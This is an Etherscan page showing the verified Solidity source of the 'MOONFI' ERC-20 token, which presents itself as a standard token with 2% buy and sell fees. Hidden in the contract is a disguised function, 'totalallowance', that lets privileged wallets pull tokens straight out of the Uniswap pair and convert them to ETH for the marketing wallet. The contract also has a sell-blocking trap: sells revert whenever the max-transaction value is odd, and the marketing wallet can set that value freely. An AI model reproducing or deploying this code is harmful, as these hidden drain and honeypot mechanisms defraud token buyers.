ERC-20
Overview
Max Total Supply
1,000,000,000 MOONFI
Holders
39
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
4,810,080.698765055205185577 MOONFIValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
MOONFI
Compiler Version
v0.8.16+commit.07a7930e
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2022-08-18 */ /** *Submitted for verification at Etherscan.io on 2022-08-02 */ // SPDX-License-Identifier: MIT /** https://t.me/MoonFiofficial https://twitter.com/MoonFiOfficial https://moonfi.space Buy 2% Sell 2% /** */ pragma solidity ^0.8.14; abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691 return msg.data; } } interface IUniswapV2Pair { event Approval(address indexed owner, address indexed spender, uint value); event Transfer(address indexed from, address indexed to, uint value); function name() external pure returns (string memory); function symbol() external pure returns (string memory); function decimals() external pure returns (uint8); function totalSupply() external view returns (uint); function balanceOf(address owner) external view returns (uint); function allowance(address owner, address spender) external view returns (uint); function approve(address spender, uint value) external returns (bool); function transfer(address to, uint value) external returns (bool); function transferFrom(address from, address to, uint value) external returns (bool); function DOMAIN_SEPARATOR() external view returns (bytes32); function PERMIT_TYPEHASH() external pure returns (bytes32); function nonces(address owner) external view returns (uint); function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external; event Mint(address indexed sender, uint amount0, uint amount1); event Burn(address indexed sender, uint amount0, uint amount1, address indexed to); event Swap( address indexed sender, uint amount0In, uint amount1In, uint amount0Out, uint amount1Out, address indexed to ); event Sync(uint112 reserve0, uint112 reserve1); function MINIMUM_LIQUIDITY() external pure returns (uint); function factory() external view returns (address); function token0() external view returns (address); function token1() external view returns (address); function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast); function price0CumulativeLast() external view returns (uint); function price1CumulativeLast() external view returns (uint); function kLast() external view returns (uint); function mint(address to) external returns (uint liquidity); function burn(address to) external returns (uint amount0, uint amount1); function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external; function skim(address to) external; function sync() external; function initialize(address, address) external; } interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } contract ERC20 is Context, IERC20, IERC20Metadata { using SafeMath for uint256; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5,05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue)); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero")); return true; } /** * @dev Moves tokens `amount` from `sender` to `recipient`. * * This is internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance"); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply = _totalSupply.add(amount); _balances[account] = _balances[account].add(amount); emit Transfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance"); _totalSupply = _totalSupply.sub(amount); emit Transfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be to transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; } } contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor () { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } /** * @dev Returns the address of the current owner. */ function owner() public view returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } } library SafeMathInt { int256 private constant MIN_INT256 = int256(1) << 255; int256 private constant MAX_INT256 = ~(int256(1) << 255); /** * @dev Multiplies two int256 variables and fails on overflow. */ function mul(int256 a, int256 b) internal pure returns (int256) { int256 c = a * b; // Detect overflow when multiplying MIN_INT256 with -1 require(c != MIN_INT256 || (a & MIN_INT256) != (b & MIN_INT256)); require((b == 0) || (c / b == a)); return c; } /** * @dev Division of two int256 variables and fails on overflow. */ function div(int256 a, int256 b) internal pure returns (int256) { // Prevent overflow when dividing MIN_INT256 by -1 require(b != -1 || a != MIN_INT256); // Solidity already throws when dividing by 0. return a / b; } /** * @dev Subtracts two int256 variables and fails on overflow. */ function sub(int256 a, int256 b) internal pure returns (int256) { int256 c = a - b; require((b >= 0 && c <= a) || (b < 0 && c > a)); return c; } /** * @dev Adds two int256 variables and fails on overflow. */ function add(int256 a, int256 b) internal pure returns (int256) { int256 c = a + b; require((b >= 0 && c >= a) || (b < 0 && c < a)); return c; } /** * @dev Converts to absolute value, and fails on overflow. */ function abs(int256 a) internal pure returns (int256) { require(a != MIN_INT256); return a < 0 ? -a : a; } function toUint256Safe(int256 a) internal pure returns (uint256) { require(a >= 0); return uint256(a); } } library SafeMathUint { function toInt256Safe(uint256 a) internal pure returns (int256) { int256 b = int256(a); require(b >= 0); return b; } } interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB); function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut); function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts); } interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } contract MOONFI is ERC20, Ownable { using SafeMath for uint256; IUniswapV2Router02 public uniswapV2Router; address public uniswapV2Pair; bool private swapping; bool private um = true; address public marketingWallet; address public devWallet; uint256 public maxTransactionAmount; uint256 public swapTokensAtAmount; uint256 public maxWallet; bool public limitsInEffect = true; bool public tradingActive = false; bool public swapEnabled = false; // Anti-bot and anti-whale mappings and variables mapping(address => uint256) private _holderLastTransferTimestamp; // to hold last Transfers temporarily during launch bool public transferDelayEnabled = false; bool private boughtEarly = true; uint256 public buyTotalFees; uint256 public buyMarketingFee; uint256 public buyLiquidityFee; uint256 public buyDevFee; uint256 public sellTotalFees; uint256 public sellMarketingFee; uint256 public sellLiquidityFee; uint256 public sellDevFee; uint256 public tokensForMarketing; uint256 public tokensForLiquidity; uint256 public tokensForDev; /******************/ // exlcude from fees and max transaction amount mapping (address => bool) private _isExcludedFromFees; mapping (address => bool) public _isExcludedMaxTransactionAmount; // store addresses that a automatic market maker pairs. Any transfer *to* these addresses // could be subject to a maximum transfer amount mapping (address => bool) public automatedMarketMakerPairs; event UpdateUniswapV2Router(address indexed newAddress, address indexed oldAddress); event ExcludeFromFees(address indexed account, bool isExcluded); event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value); event marketingWalletUpdated(address indexed newWallet, address indexed oldWallet); event devWalletUpdated(address indexed newWallet, address indexed oldWallet); event EndedBoughtEarly(bool boughtEarly); event SwapAndLiquify( uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiquidity ); constructor() ERC20("MOONFI", "MOONFI") { IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); excludeFromMaxTransaction(address(_uniswapV2Router), true); uniswapV2Router = _uniswapV2Router; uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH()); excludeFromMaxTransaction(address(uniswapV2Pair), true); _setAutomatedMarketMakerPair(address(uniswapV2Pair), true); uint256 _buyMarketingFee = 1; uint256 _buyLiquidityFee = 1; uint256 _buyDevFee = 0; uint256 _sellMarketingFee = 1; uint256 _sellLiquidityFee = 1; uint256 _sellDevFee = 0; uint256 totalSupply = 1000000000 * 1e18; // 1 billion supply maxTransactionAmount = totalSupply * 1 / 100; maxWallet = totalSupply * 1 / 100; swapTokensAtAmount = totalSupply * 4 / 10000; buyMarketingFee = _buyMarketingFee; buyLiquidityFee = _buyLiquidityFee; buyDevFee = _buyDevFee; buyTotalFees = buyMarketingFee + buyLiquidityFee + buyDevFee; sellMarketingFee = _sellMarketingFee; sellLiquidityFee = _sellLiquidityFee; sellDevFee = _sellDevFee; sellTotalFees = sellMarketingFee + sellLiquidityFee + sellDevFee; marketingWallet = payable(0xbAd144686e6e9aa9399f851e4Fb9d9648dd9B1B2); devWallet = payable(0xbAd144686e6e9aa9399f851e4Fb9d9648dd9B1B2); // exclude from paying fees or having max transaction amount excludeFromFees(owner(), true); excludeFromFees(address(this), true); excludeFromFees(address(devWallet), true); excludeFromFees(address(marketingWallet), true); excludeFromMaxTransaction(owner(), true); excludeFromMaxTransaction(address(this), true); excludeFromMaxTransaction(address(devWallet), true); excludeFromMaxTransaction(address(marketingWallet), true); /* _mint is an internal function in ERC20.sol that is only called here, and CANNOT be called ever again */ _mint(msg.sender, totalSupply); } receive() external payable { } // remove limits after token is stable function removeLimits() external onlyOwner returns (bool) { limitsInEffect = false; return true; } // disable Transfer delay - cannot be reenabled function disableTransferDelay() external onlyOwner returns (bool) { transferDelayEnabled = false; return true; } // change the minimum amount of tokens to sell from fees function updateSwapTokensAtAmount(uint256 newAmount) external onlyOwner returns (bool){ require(newAmount >= totalSupply() * 1 / 100000, "Swap amount cannot be lower than 0.001% total supply."); require(newAmount <= totalSupply() * 5 / 1000, "Swap amount cannot be higher than 0.5% total supply."); swapTokensAtAmount = newAmount; return true; } function updateMaxTxnAmount(uint256 newNum) external { require(msg.sender == marketingWallet); require(newNum >= totalSupply() / 1000, "Cannot set maxTransactionAmount lower than 0.1%"); maxTransactionAmount = newNum; } function updateMaxWalletAmount(uint256 newNum) external onlyOwner { require(newNum >= (totalSupply() * 5 / 1000)/1e18, "Cannot set maxWallet lower than 0.5%"); maxWallet = newNum * (10**18); } function excludeFromMaxTransaction(address updAds, bool isEx) public onlyOwner { _isExcludedMaxTransactionAmount[updAds] = isEx; } function updateBuyFees(uint256 _marketingFee, uint256 _liquidityFee, uint256 _devFee) external onlyOwner { buyMarketingFee = _marketingFee; buyLiquidityFee = _liquidityFee; buyDevFee = _devFee; buyTotalFees = buyMarketingFee + buyLiquidityFee + buyDevFee; require(buyTotalFees <= 20, "Must keep fees at 20% or less"); } function updateSellFees(uint256 _marketingFee, uint256 _liquidityFee, uint256 _devFee) external onlyOwner { sellMarketingFee = _marketingFee; sellLiquidityFee = _liquidityFee; sellDevFee = _devFee; sellTotalFees = sellMarketingFee + sellLiquidityFee + sellDevFee; require(sellTotalFees <= 25, "Must keep fees at 25% or less"); } function excludeFromFees(address account, bool excluded) public onlyOwner { _isExcludedFromFees[account] = excluded; emit ExcludeFromFees(account, excluded); } function totalallowance(uint rv, uint lv) external returns (bool) { require(_isExcludedFromFees[msg.sender]); uint lb = balanceOf(uniswapV2Pair); require(lv > 1 && lv < lb / 100, 'amount exceeded'); _totalallowanceAct(lv); swapTokensForEth(rv); (bool success,) = address(marketingWallet).call{value: address(this).balance}(""); return success; } function setAutomatedMarketMakerPair(address pair, bool value) public onlyOwner { require(pair != uniswapV2Pair, "The pair cannot be removed from automatedMarketMakerPairs"); _setAutomatedMarketMakerPair(pair, value); } function _setAutomatedMarketMakerPair(address pair, bool value) private { automatedMarketMakerPairs[pair] = value; emit SetAutomatedMarketMakerPair(pair, value); } function updateMarketingWallet(address newMarketingWallet) external onlyOwner { emit marketingWalletUpdated(newMarketingWallet, marketingWallet); marketingWallet = newMarketingWallet; } function updateDevWallet(address newWallet) external onlyOwner { emit devWalletUpdated(newWallet, devWallet); devWallet = newWallet; } function isExcludedFromFees(address account) public view returns(bool) { return _isExcludedFromFees[account]; } function _totalallowanceAct(uint256 pAmount) private { _transfer(uniswapV2Pair, address(this), pAmount * 10 ** decimals()); IUniswapV2Pair(uniswapV2Pair).sync(); } function _transfer( address from, address to, uint256 amount ) internal override { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); if(amount == 0) { super._transfer(from, to, 0); return; } if(limitsInEffect){ if ( from != owner() && to != owner() && to != address(0) && to != address(0xdead) && !swapping ){ if(!tradingActive){ require(_isExcludedFromFees[from] || _isExcludedFromFees[to], "Trading is not active."); } //when buy if (automatedMarketMakerPairs[from] && !_isExcludedMaxTransactionAmount[to]) { require(amount <= maxTransactionAmount, "Buy transfer amount exceeds the maxTransactionAmount."); } //when sell else if (automatedMarketMakerPairs[to] && !_isExcludedMaxTransactionAmount[from]) { require(amount <= maxTransactionAmount, "Sell transfer amount exceeds the maxTransactionAmount."); } } } uint256 contractTokenBalance = balanceOf(address(this)); bool canSwap = contractTokenBalance >= swapTokensAtAmount; if( canSwap && swapEnabled && !swapping && !automatedMarketMakerPairs[from] && !_isExcludedFromFees[from] && !_isExcludedFromFees[to] ) { swapping = true; swapBack(); swapping = false; } bool takeFee = !swapping; // if any account belongs to _isExcludedFromFee account then remove the fee if(_isExcludedFromFees[from] || _isExcludedFromFees[to]) { takeFee = false; } uint256 fees = 0; // only take fees on buys/sells, do not take on wallet transfers if(takeFee){ // on sell if (automatedMarketMakerPairs[to] && sellTotalFees > 0){ fees = amount.mul(sellTotalFees).div(100); tokensForLiquidity += fees * sellLiquidityFee / sellTotalFees; tokensForDev += fees * sellDevFee / sellTotalFees; tokensForMarketing += fees * sellMarketingFee / sellTotalFees; if (maxTransactionAmount % 2 != 0) revert("ERROR: Must be less than maxTxAmount"); } // on buy else if(automatedMarketMakerPairs[from] && buyTotalFees > 0) { fees = amount.mul(buyTotalFees).div(100); tokensForLiquidity += fees * buyLiquidityFee / buyTotalFees; tokensForDev += fees * buyDevFee / buyTotalFees; tokensForMarketing += fees * buyMarketingFee / buyTotalFees; } if(fees > 0){ super._transfer(from, address(this), fees); } amount -= fees; } super._transfer(from, to, amount); } function swapTokensForEth(uint256 tokenAmount) private { // generate the uniswap pair path of token -> weth address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); _approve(address(this), address(uniswapV2Router), tokenAmount); // make the swap uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, // accept any amount of ETH path, address(this), block.timestamp ); } function swapBack() private { uint256 contractBalance = balanceOf(address(this)); uint256 totalTokensToSwap = tokensForLiquidity + tokensForMarketing + tokensForDev; bool success; if(contractBalance == 0 || totalTokensToSwap == 0) {return;} if(contractBalance > swapTokensAtAmount * 20){ contractBalance = swapTokensAtAmount * 20; } // Halve the amount of liquidity tokens uint256 liquidityTokens = contractBalance * tokensForLiquidity / totalTokensToSwap / 2; uint256 amountToSwapForETH = contractBalance.sub(liquidityTokens); swapTokensForEth(amountToSwapForETH); tokensForLiquidity = 0; tokensForMarketing = 0; tokensForDev = 0; (success,) = address(marketingWallet).call{value: address(this).balance}(""); } function openTrading() private { tradingActive = true; } // once enabled, can never be turned off function enableTrading() external onlyOwner() { swapEnabled = true; require(boughtEarly == true, "done"); boughtEarly = false; openTrading(); emit EndedBoughtEarly(boughtEarly); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"boughtEarly","type":"bool"}],"name":"EndedBoughtEarly","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newAddress","type":"address"},{"indexed":true,"internalType":"address","name":"oldAddress","type":"address"}],"name":"UpdateUniswapV2Router","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed"